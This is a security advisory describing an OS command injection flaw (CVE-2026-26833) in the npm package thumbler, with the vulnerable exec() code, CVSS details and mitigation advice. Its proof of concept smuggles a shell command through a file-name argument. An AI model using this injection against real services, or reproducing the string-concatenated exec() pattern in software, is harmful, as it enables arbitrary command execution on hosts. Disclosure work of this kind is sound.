# CVE-2026-26833: OS command injection in thumbler

## Summary

`thumbler` through version `1.1.2` allows OS command injection in `thumbnail()` in `lib/thumbler.js`. The package concatenates the `input`, `output`, `time`, and `size` values into a single `ffmpeg` command string and executes that string with `child_process.exec()`. An attacker who controls one of those values can inject shell syntax and run arbitrary commands.

## Affected product

| Product | Affected versions | Fixed version |
| --- | --- | --- |
| thumbler | all versions through 1.1.2 | no fix available as of 2026-03-24 |

## Vulnerability details

- CVE ID: `CVE-2026-26833`
- CWE: `CWE-78` - OS Command Injection
- CVSS 3.1: `9.8` (`Critical`)
- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- Affected component: `lib/thumbler.js`, `thumbnail()`

The vulnerable code path constructs the following shell string:

```js
exec(
  'ffmpeg -ss ' + time + ' -i "' + input + '" -vframes 1 -s ' + size + ' "' + output + '"',
  ...
);
```

Because the command is assembled as a string, each attacker-controlled field is a possible injection point.

## Technical impact

Any service that generates thumbnails from user-controlled media can end up executing commands on the host while calling `thumbnail()`.

## Proof of concept

```js
require("thumbler").thumbnail(
  'test.mp4"; id > /tmp/pwned; echo "',
  "/tmp/out.jpg",
  {},
  () => {}
);
```

## Mitigation

No fixed npm release is available at the time of writing. If you still depend on this package:

1. Do not pass untrusted data into `thumbnail()`.
2. Replace shell-string concatenation with argument-safe process execution.
3. Move to a maintained thumbnail generation library or a fixed fork.

## References

- https://www.npmjs.com/package/thumbler
- https://github.com/mmahrous/thumbler
- https://github.com/mmahrous/thumbler/blob/master/lib/thumbler.js